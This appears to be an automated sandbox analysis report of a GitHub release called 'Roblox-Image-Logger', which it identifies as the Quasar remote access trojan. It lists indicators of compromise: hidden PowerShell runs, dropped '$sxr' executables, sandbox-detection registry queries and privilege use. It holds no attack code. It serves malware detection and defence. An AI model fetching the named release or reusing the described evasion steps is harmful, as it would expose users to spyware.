quasar | hxxps://github[.]com/Gismo0666/Roblox-Image-Logger/releases/tag/Roblox-Image-Logger

Analysis

max time kernel
123s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
18-05-2024 20:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Gismo0666/Roblox-Image-Logger/releases/tag/Roblox-Image-Logger

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
1000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4852-374-0x000001CED5B30000-0x000001CED62DA000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1168 powershell.exe
Executes dropped EXE 5 IoCs

Processes:

$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe$sxr-cmd.exe$sxr-powershell.exe

pid process

5104 $sxr-mshta.exe
2940 $sxr-cmd.exe
4852 $sxr-powershell.exe
904 $sxr-cmd.exe
2692 $sxr-powershell.exe

pid	process
1168	powershell.exe

pid	process
5104	$sxr-mshta.exe
2940	$sxr-cmd.exe
4852	$sxr-powershell.exe
904	$sxr-cmd.exe
2692	$sxr-powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

svchost.exeOfficeClickToRun.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Drops file in Windows directory 6 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\$sxr-powershell.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	powershell.exe
File created	C:\Windows\$sxr-mshta.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	powershell.exe
File created	C:\Windows\$sxr-cmd.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-cmd.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Winword.exewmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Winword.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Winword.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Winword.exechrome.exemsedge.exewmiprvse.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	Winword.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 16 IoCs

Processes:

OfficeClickToRun.exechrome.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716065025"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133605386299265016"	chrome.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 18 May 2024 20:43:46 GMT"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={82EAD5DE-CD61-4576-A2D0-391FAFAA58D9}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 45 IoCs

Processes:

Explorer.EXEOpenWith.exe$sxr-mshta.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	$sxr-mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE

NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Roblox-Image-Logger-Roblox-Image-Logger.zip:Zone.Identifier msedge.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

Winword.exe

pid process

3840 Winword.exe
3840 Winword.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Roblox-Image-Logger-Roblox-Image-Logger.zip:Zone.Identifier	msedge.exe

pid	process
3840	Winword.exe
3840	Winword.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exepowershell.exe$sxr-powershell.exe$sxr-powershell.exe

pid	process
1888	msedge.exe
1888	msedge.exe
1968	msedge.exe
1968	msedge.exe
3876	identity_helper.exe
3876	identity_helper.exe
2440	msedge.exe
2440	msedge.exe
4956	msedge.exe
4956	msedge.exe
1168	powershell.exe
1168	powershell.exe
1168	powershell.exe
1168	powershell.exe
1168	powershell.exe
1168	powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
2692	$sxr-powershell.exe
2692	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
2692	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe
4852	$sxr-powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

OpenWith.exeExplorer.EXE

pid process

3688 OpenWith.exe
3304 Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

Processes:

msedge.exechrome.exe

pid	process
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exe$sxr-powershell.exe$sxr-powershell.exeExplorer.EXEsvchost.exechrome.exesvchost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeDebugPrivilege	4852	$sxr-powershell.exe
Token: SeDebugPrivilege	4852	$sxr-powershell.exe
Token: SeDebugPrivilege	4852	$sxr-powershell.exe
Token: SeDebugPrivilege	2692	$sxr-powershell.exe
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeAuditPrivilege	2208	svchost.exe
Token: SeAuditPrivilege	2208	svchost.exe
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	5936	chrome.exe
Token: SeCreatePagefilePrivilege	5936	chrome.exe
Token: SeShutdownPrivilege	5936	chrome.exe
Token: SeCreatePagefilePrivilege	5936	chrome.exe
Token: SeShutdownPrivilege	5936	chrome.exe
Token: SeCreatePagefilePrivilege	5936	chrome.exe
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	5936	chrome.exe
Token: SeCreatePagefilePrivilege	5936	chrome.exe
Token: SeAssignPrimaryTokenPrivilege	2640	svchost.exe
Token: SeIncreaseQuotaPrivilege	2640	svchost.exe
Token: SeSecurityPrivilege	2640	svchost.exe
Token: SeTakeOwnershipPrivilege	2640	svchost.exe
Token: SeLoadDriverPrivilege	2640	svchost.exe
Token: SeSystemtimePrivilege	2640	svchost.exe
Token: SeBackupPrivilege	2640	svchost.exe
Token: SeRestorePrivilege	2640	svchost.exe
Token: SeShutdownPrivilege	2640	svchost.exe
Token: SeSystemEnvironmentPrivilege	2640	svchost.exe
Token: SeUndockPrivilege	2640	svchost.exe
Token: SeManageVolumePrivilege	2640	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2640	svchost.exe
Token: SeIncreaseQuotaPrivilege	2640	svchost.exe
Token: SeSecurityPrivilege	2640	svchost.exe
Token: SeTakeOwnershipPrivilege	2640	svchost.exe
Token: SeLoadDriverPrivilege	2640	svchost.exe
Token: SeSystemtimePrivilege	2640	svchost.exe
Token: SeBackupPrivilege	2640	svchost.exe
Token: SeRestorePrivilege	2640	svchost.exe
Token: SeShutdownPrivilege	2640	svchost.exe
Token: SeSystemEnvironmentPrivilege	2640	svchost.exe
Token: SeUndockPrivilege	2640	svchost.exe
Token: SeManageVolumePrivilege	2640	svchost.exe
Token: SeAuditPrivilege	2612	svchost.exe
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exechrome.exe

pid	process
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exechrome.exe

pid	process
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
1968	msedge.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe
5936	chrome.exe

Suspicious use of SetWindowsHookEx 37 IoCs

Processes:

OpenWith.exeWinword.exe$sxr-powershell.exeExplorer.EXE

pid	process
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3688	OpenWith.exe
3840	Winword.exe
3840	Winword.exe
3840	Winword.exe
3840	Winword.exe
3840	Winword.exe
3840	Winword.exe
3840	Winword.exe
3840	Winword.exe
4852	$sxr-powershell.exe
3304	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 1968 wrote to memory of 5012	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 5012	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
PID 1968 wrote to memory of 2632	1968	msedge.exe	msedge.exe
